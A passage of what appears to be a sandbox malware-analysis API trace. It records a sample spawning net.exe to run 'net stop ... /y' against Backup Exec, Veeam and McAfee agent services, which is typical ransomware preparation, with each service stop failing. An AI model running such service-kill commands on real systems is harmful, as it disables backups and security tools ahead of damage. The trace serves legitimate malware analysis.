service="BACKUPEXECAGENTBROWSER", opcode=0x0, arg=0x0, bufptr=0x2bf9b0 | out: bufptr=0x2bf9b0) returned 0x889 [0206.563] wcscpy_s (in: _Destination=0x74a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0206.563] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0206.565] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x74b338, nSize=0x800, Arguments=0x749dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0206.567] GetFileType (hFile=0x26c) returned 0x3 [0206.567] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x573ca0 [0206.567] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x573ca0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0206.567] WriteFile (in: hFile=0x26c, lpBuffer=0x573ca0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x2bf8f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf8f0, lpOverlapped=0x0) returned 0 [0206.567] LocalFree (hMem=0x573ca0) returned 0x0 [0206.567] GetFileType (hFile=0x26c) returned 0x3 [0206.567] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x576290 [0206.567] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x576290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nW", lpUsedDefaultChar=0x0) returned 2 [0206.567] WriteFile (in: hFile=0x26c, lpBuffer=0x576290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bf8f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf8f0, lpOverlapped=0x0) returned 0 [0206.567] LocalFree (hMem=0x576290) returned 0x0 [0206.567] _ultow (in: _Dest=0x889, _Radix=2881824 | out: _Dest=0x889) returned="2185" [0206.567] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x74b338, nSize=0x800, Arguments=0x749dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0206.567] GetFileType (hFile=0x26c) returned 0x3 [0206.567] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x576290 [0206.567] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x576290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0206.567] WriteFile (in: hFile=0x26c, lpBuffer=0x576290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x2bf8fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf8fc, lpOverlapped=0x0) returned 0 [0206.567] LocalFree (hMem=0x576290) returned 0x0 [0206.567] GetFileType (hFile=0x26c) returned 0x3 [0206.567] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x576290 [0206.567] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x576290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nW", lpUsedDefaultChar=0x0) returned 2 [0206.567] WriteFile (in: hFile=0x26c, lpBuffer=0x576290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x2bf8fc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2bf8fc, lpOverlapped=0x0) returned 0 [0206.567] LocalFree (hMem=0x576290) returned 0x0 [0206.568] NetApiBufferFree (Buffer=0x571c90) returned 0x0 [0206.568] NetApiBufferFree (Buffer=0x571ca8) returned 0x0 [0206.568] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecAgentBrowser /y" [0206.568] exit (_Code=2) Process: id = "240" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1981c000" os_pid = "0x4f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamHvIntegrationSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 413 os_tid = 0x41c Process: id = "241" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x62123000" os_pid = "0x864" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "240" os_parent_pid = "0x4f0" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamHvIntegrationSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 414 os_tid = 0x844 [0206.727] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fe20 | out: lpSystemTimeAsFileTime=0x12fe20*(dwLowDateTime=0x44687640, dwHighDateTime=0x1d57a87)) [0206.727] GetCurrentProcessId () returned 0x864 [0206.727] GetCurrentThreadId () returned 0x844 [0206.727] GetTickCount () returned 0x116d49e [0206.727] QueryPerformanceCounter (in: lpPerformanceCount=0x12fe18 | out: lpPerformanceCount=0x12fe18*=32701150935) returned 1 [0206.727] GetModuleHandleA (lpModuleName=0x0) returned 0x960000 [0206.727] __set_app_type (_Type=0x1) [0206.727] __p__fmode () returned 0x74eb31f4 [0206.727] __p__commode () returned 0x74eb31fc [0206.728] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x96ffe6) returned 0x0 [0206.728] __getmainargs (in: _Argc=0x979064, _Argv=0x97906c, _Env=0x979068, _DoWildCard=0, _StartInfo=0x979024 | out: _Argc=0x979064, _Argv=0x97906c, _Env=0x979068) returned 0 [0206.728] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.728] GetConsoleOutputCP () returned 0x1b5 [0206.729] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x979080 | out: lpCPInfo=0x979080) returned 1 [0206.729] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.732] sprintf_s (in: _DstBuf=0x12fdd8, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0206.732] setlocale (category=0, locale=".437") returned="English_United States.437" [0206.734] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0206.734] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0206.734] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamHvIntegrationSvc /y" [0206.734] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fba4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0206.734] RtlAllocateHeap (HeapHandle=0x210000, Flags=0x0, Size=0x7e) returned 0x223c20 [0206.735] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0206.735] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12fda8 | out: Buffer=0x12fda8*=0x221c80) returned 0x0 [0206.735] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x12fda8 | out: Buffer=0x12fda8*=0x221c98) returned 0x0 [0206.735] _fileno (_File=0x74eb2900) returned -2 [0206.735] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0206.735] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0206.735] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0206.735] _wcsicmp (_String1="config", _String2="stop") returned -16 [0206.735] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0206.735] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0206.735] _wcsicmp (_String1="file", _String2="stop") returned -13 [0206.735] _wcsicmp (_String1="files", _String2="stop") returned -13 [0206.735] _wcsicmp (_String1="group", _String2="stop") returned -12 [0206.735] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0206.735] _wcsicmp (_String1="help", _String2="stop") returned -11 [0206.735] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0206.735] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0206.735] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0206.735] _wcsicmp (_String1="session", _String2="stop") returned -15 [0206.735] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0206.735] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0206.735] _wcsicmp (_String1="share", _String2="stop") returned -12 [0206.736] _wcsicmp (_String1="start", _String2="stop") returned -14 [0206.736] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0206.736] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0206.736] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0206.736] _wcsicmp (_String1="accounts", _String2="VeeamHvIntegrationSvc") returned -21 [0206.736] _wcsicmp (_String1="computer", _String2="VeeamHvIntegrationSvc") returned -19 [0206.736] _wcsicmp (_String1="config", _String2="VeeamHvIntegrationSvc") returned -19 [0206.736] _wcsicmp (_String1="continue", _String2="VeeamHvIntegrationSvc") returned -19 [0206.736] _wcsicmp (_String1="cont", _String2="VeeamHvIntegrationSvc") returned -19 [0206.736] _wcsicmp (_String1="file", _String2="VeeamHvIntegrationSvc") returned -16 [0206.736] _wcsicmp (_String1="files", _String2="VeeamHvIntegrationSvc") returned -16 [0206.736] _wcsicmp (_String1="group", _String2="VeeamHvIntegrationSvc") returned -15 [0206.736] _wcsicmp (_String1="groups", _String2="VeeamHvIntegrationSvc") returned -15 [0206.736] _wcsicmp (_String1="help", _String2="VeeamHvIntegrationSvc") returned -14 [0206.736] _wcsicmp (_String1="helpmsg", _String2="VeeamHvIntegrationSvc") returned -14 [0206.736] _wcsicmp (_String1="localgroup", _String2="VeeamHvIntegrationSvc") returned -10 [0206.736] _wcsicmp (_String1="pause", _String2="VeeamHvIntegrationSvc") returned -6 [0206.736] _wcsicmp (_String1="session", _String2="VeeamHvIntegrationSvc") returned -3 [0206.736] _wcsicmp (_String1="sessions", _String2="VeeamHvIntegrationSvc") returned -3 [0206.736] _wcsicmp (_String1="sess", _String2="VeeamHvIntegrationSvc") returned -3 [0206.736] _wcsicmp (_String1="share", _String2="VeeamHvIntegrationSvc") returned -3 [0206.736] _wcsicmp (_String1="start", _String2="VeeamHvIntegrationSvc") returned -3 [0206.736] _wcsicmp (_String1="stats", _String2="VeeamHvIntegrationSvc") returned -3 [0206.736] _wcsicmp (_String1="statistics", _String2="VeeamHvIntegrationSvc") returned -3 [0206.736] _wcsicmp (_String1="stop", _String2="VeeamHvIntegrationSvc") returned -3 [0206.736] _wcsicmp (_String1="time", _String2="VeeamHvIntegrationSvc") returned -2 [0206.736] _wcsicmp (_String1="user", _String2="VeeamHvIntegrationSvc") returned -1 [0206.736] _wcsicmp (_String1="users", _String2="VeeamHvIntegrationSvc") returned -1 [0206.736] _wcsicmp (_String1="msg", _String2="VeeamHvIntegrationSvc") returned -9 [0206.736] _wcsicmp (_String1="messenger", _String2="VeeamHvIntegrationSvc") returned -9 [0206.736] _wcsicmp (_String1="receiver", _String2="VeeamHvIntegrationSvc") returned -4 [0206.736] _wcsicmp (_String1="rcv", _String2="VeeamHvIntegrationSvc") returned -4 [0206.736] _wcsicmp (_String1="netpopup", _String2="VeeamHvIntegrationSvc") returned -8 [0206.736] _wcsicmp (_String1="redirector", _String2="VeeamHvIntegrationSvc") returned -4 [0206.736] _wcsicmp (_String1="redir", _String2="VeeamHvIntegrationSvc") returned -4 [0206.736] _wcsicmp (_String1="rdr", _String2="VeeamHvIntegrationSvc") returned -4 [0206.736] _wcsicmp (_String1="workstation", _String2="VeeamHvIntegrationSvc") returned 1 [0206.737] _wcsicmp (_String1="work", _String2="VeeamHvIntegrationSvc") returned 1 [0206.737] _wcsicmp (_String1="wksta", _String2="VeeamHvIntegrationSvc") returned 1 [0206.737] _wcsicmp (_String1="prdr", _String2="VeeamHvIntegrationSvc") returned -6 [0206.737] _wcsicmp (_String1="devrdr", _String2="VeeamHvIntegrationSvc") returned -18 [0206.737] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamHvIntegrationSvc") returned -10 [0206.737] _wcsicmp (_String1="server", _String2="VeeamHvIntegrationSvc") returned -3 [0206.737] _wcsicmp (_String1="svr", _String2="VeeamHvIntegrationSvc") returned -3 [0206.737] _wcsicmp (_String1="srv", _String2="VeeamHvIntegrationSvc") returned -3 [0206.737] _wcsicmp (_String1="lanmanserver", _String2="VeeamHvIntegrationSvc") returned -10 [0206.737] _wcsicmp (_String1="alerter", _String2="VeeamHvIntegrationSvc") returned -21 [0206.737] _wcsicmp (_String1="netlogon", _String2="VeeamHvIntegrationSvc") returned -8 [0206.737] _wcsupr (in: _String="VeeamHvIntegrationSvc" | out: _String="VEEAMHVINTEGRATIONSVC") returned="VEEAMHVINTEGRATIONSVC" [0206.737] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2254f0 [0206.741] GetServiceKeyNameW (in: hSCManager=0x2254f0, lpDisplayName="VEEAMHVINTEGRATIONSVC", lpServiceName=0x97aaf0, lpcchBuffer=0x12fd44 | out: lpServiceName="", lpcchBuffer=0x12fd44) returned 0 [0206.742] _wcsicmp (_String1="msg", _String2="VEEAMHVINTEGRATIONSVC") returned -9 [0206.742] _wcsicmp (_String1="messenger", _String2="VEEAMHVINTEGRATIONSVC") returned -9 [0206.742] _wcsicmp (_String1="receiver", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0206.742] _wcsicmp (_String1="rcv", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0206.742] _wcsicmp (_String1="redirector", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0206.742] _wcsicmp (_String1="redir", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0206.742] _wcsicmp (_String1="rdr", _String2="VEEAMHVINTEGRATIONSVC") returned -4 [0206.742] _wcsicmp (_String1="workstation", _String2="VEEAMHVINTEGRATIONSVC") returned 1 [0206.742] _wcsicmp (_String1="work", _String2="VEEAMHVINTEGRATIONSVC") returned 1 [0206.742] _wcsicmp (_String1="wksta", _String2="VEEAMHVINTEGRATIONSVC") returned 1 [0206.742] _wcsicmp (_String1="prdr", _String2="VEEAMHVINTEGRATIONSVC") returned -6 [0206.742] _wcsicmp (_String1="devrdr", _String2="VEEAMHVINTEGRATIONSVC") returned -18 [0206.742] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMHVINTEGRATIONSVC") returned -10 [0206.742] _wcsicmp (_String1="server", _String2="VEEAMHVINTEGRATIONSVC") returned -3 [0206.742] _wcsicmp (_String1="svr", _String2="VEEAMHVINTEGRATIONSVC") returned -3 [0206.742] _wcsicmp (_String1="srv", _String2="VEEAMHVINTEGRATIONSVC") returned -3 [0206.742] _wcsicmp (_String1="lanmanserver", _String2="VEEAMHVINTEGRATIONSVC") returned -10 [0206.742] _wcsicmp (_String1="alerter", _String2="VEEAMHVINTEGRATIONSVC") returned -21 [0206.742] _wcsicmp (_String1="netlogon", _String2="VEEAMHVINTEGRATIONSVC") returned -8 [0206.742] NetServiceControl (in: servername=0x0, service="VEEAMHVINTEGRATIONSVC", opcode=0x0, arg=0x0, bufptr=0x12fd40 | out: bufptr=0x12fd40) returned 0x889 [0206.743] wcscpy_s (in: _Destination=0x97a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0206.743] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0206.744] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x97b338, nSize=0x800, Arguments=0x979dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0206.746] GetFileType (hFile=0x26c) returned 0x3 [0206.746] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x224020 [0206.746] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x224020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n!", lpUsedDefaultChar=0x0) returned 30 [0206.746] WriteFile (in: hFile=0x26c, lpBuffer=0x224020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x12fc80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fc80, lpOverlapped=0x0) returned 0 [0206.746] LocalFree (hMem=0x224020) returned 0x0 [0206.746] GetFileType (hFile=0x26c) returned 0x3 [0206.746] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2262c8 [0206.746] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2262c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0206.746] WriteFile (in: hFile=0x26c, lpBuffer=0x2262c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12fc80, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fc80, lpOverlapped=0x0) returned 0 [0206.746] LocalFree (hMem=0x2262c8) returned 0x0 [0206.746] _ultow (in: _Dest=0x889, _Radix=1244336 | out: _Dest=0x889) returned="2185" [0206.746] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x97b338, nSize=0x800, Arguments=0x979dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0206.746] GetFileType (hFile=0x26c) returned 0x3 [0206.746] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2262c8 [0206.746] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2262c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0206.746] WriteFile (in: hFile=0x26c, lpBuffer=0x2262c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x12fc8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fc8c, lpOverlapped=0x0) returned 0 [0206.746] LocalFree (hMem=0x2262c8) returned 0x0 [0206.746] GetFileType (hFile=0x26c) returned 0x3 [0206.746] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2262c8 [0206.746] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2262c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0206.746] WriteFile (in: hFile=0x26c, lpBuffer=0x2262c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x12fc8c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x12fc8c, lpOverlapped=0x0) returned 0 [0206.746] LocalFree (hMem=0x2262c8) returned 0x0 [0206.747] NetApiBufferFree (Buffer=0x221c80) returned 0x0 [0206.747] NetApiBufferFree (Buffer=0x221c98) returned 0x0 [0206.747] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamHvIntegrationSvc /y" [0206.747] exit (_Code=2) Process: id = "242" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x921000" os_pid = "0x840" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop masvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 415 os_tid = 0x86c Process: id = "243" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x610ca000" os_pid = "0x890" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "242" os_parent_pid = "0x840" cmd_line = "C:\\Windows\\system32\\net1 stop masvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 416 os_tid = 0x8d8 [0206.903] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb68 | out: lpSystemTimeAsFileTime=0x22fb68*(dwLowDateTime=0x4482a560, dwHighDateTime=0x1d57a87)) [0206.903] GetCurrentProcessId () returned 0x890 [0206.903] GetCurrentThreadId () returned 0x8d8 [0206.903] GetTickCount () returned 0x116d54a [0206.903] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb60 | out: lpPerformanceCount=0x22fb60*=32718851935) returned 1 [0206.904] GetModuleHandleA (lpModuleName=0x0) returned 0xab0000 [0206.904] __set_app_type (_Type=0x1) [0206.904] __p__fmode () returned 0x74eb31f4 [0206.904] __p__commode () returned 0x74eb31fc [0206.904] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xabffe6) returned 0x0 [0206.905] __getmainargs (in: _Argc=0xac9064, _Argv=0xac906c, _Env=0xac9068, _DoWildCard=0, _StartInfo=0xac9024 | out: _Argc=0xac9064, _Argv=0xac906c, _Env=0xac9068) returned 0 [0206.905] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.905] GetConsoleOutputCP () returned 0x1b5 [0206.905] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac9080 | out: lpCPInfo=0xac9080) returned 1 [0206.905] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.908] sprintf_s (in: _DstBuf=0x22fb20, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0206.908] setlocale (category=0, locale=".437") returned="English_United States.437" [0206.910] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0206.910] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0206.910] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop masvc /y" [0206.910] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x22f8ec, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0206.910] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5e) returned 0x503bf0 [0206.910] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0206.911] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22faf0 | out: Buffer=0x22faf0*=0x501c50) returned 0x0 [0206.911] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x22faf0 | out: Buffer=0x22faf0*=0x501c68) returned 0x0 [0206.911] _fileno (_File=0x74eb2900) returned -2 [0206.911] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0206.911] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0206.911] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0206.911] _wcsicmp (_String1="config", _String2="stop") returned -16 [0206.911] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0206.911] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0206.911] _wcsicmp (_String1="file", _String2="stop") returned -13 [0206.911] _wcsicmp (_String1="files", _String2="stop") returned -13 [0206.911] _wcsicmp (_String1="group", _String2="stop") returned -12 [0206.911] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0206.911] _wcsicmp (_String1="help", _String2="stop") returned -11 [0206.911] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0206.911] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0206.911] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0206.911] _wcsicmp (_String1="session", _String2="stop") returned -15 [0206.911] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0206.911] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0206.911] _wcsicmp (_String1="share", _String2="stop") returned -12 [0206.911] _wcsicmp (_String1="start", _String2="stop") returned -14 [0206.911] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0206.911] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0206.911] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0206.911] _wcsicmp (_String1="accounts", _String2="masvc") returned -12 [0206.911] _wcsicmp (_String1="computer", _String2="masvc") returned -10 [0206.911] _wcsicmp (_String1="config", _String2="masvc") returned -10 [0206.911] _wcsicmp (_String1="continue", _String2="masvc") returned -10 [0206.911] _wcsicmp (_String1="cont", _String2="masvc") returned -10 [0206.911] _wcsicmp (_String1="file", _String2="masvc") returned -7 [0206.911] _wcsicmp (_String1="files", _String2="masvc") returned -7 [0206.911] _wcsicmp (_String1="group", _String2="masvc") returned -6 [0206.912] _wcsicmp (_String1="groups", _String2="masvc") returned -6 [0206.912] _wcsicmp (_String1="help", _String2="masvc") returned -5 [0206.912] _wcsicmp (_String1="helpmsg", _String2="masvc") returned -5 [0206.912] _wcsicmp (_String1="localgroup", _String2="masvc") returned -1 [0206.912] _wcsicmp (_String1="pause", _String2="masvc") returned 3 [0206.912] _wcsicmp (_String1="session", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="sessions", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="sess", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="share", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="start", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="stats", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="statistics", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="stop", _String2="masvc") returned 6 [0206.912] _wcsicmp (_String1="time", _String2="masvc") returned 7 [0206.912] _wcsicmp (_String1="user", _String2="masvc") returned 8 [0206.912] _wcsicmp (_String1="users", _String2="masvc") returned 8 [0206.912] _wcsicmp (_String1="msg", _String2="masvc") returned 18 [0206.912] _wcsicmp (_String1="messenger", _String2="masvc") returned 4 [0206.912] _wcsicmp (_String1="receiver", _String2="masvc") returned 5 [0206.912] _wcsicmp (_String1="rcv", _String2="masvc") returned 5 [0206.912] _wcsicmp (_String1="netpopup", _String2="masvc") returned 1 [0206.912] _wcsicmp (_String1="redirector", _String2="masvc") returned 5 [0206.912] _wcsicmp (_String1="redir", _String2="masvc") returned 5 [0206.912] _wcsicmp (_String1="rdr", _String2="masvc") returned 5 [0206.912] _wcsicmp (_String1="workstation", _String2="masvc") returned 10 [0206.912] _wcsicmp (_String1="work", _String2="masvc") returned 10 [0206.912] _wcsicmp (_String1="wksta", _String2="masvc") returned 10 [0206.912] _wcsicmp (_String1="prdr", _String2="masvc") returned 3 [0206.912] _wcsicmp (_String1="devrdr", _String2="masvc") returned -9 [0206.912] 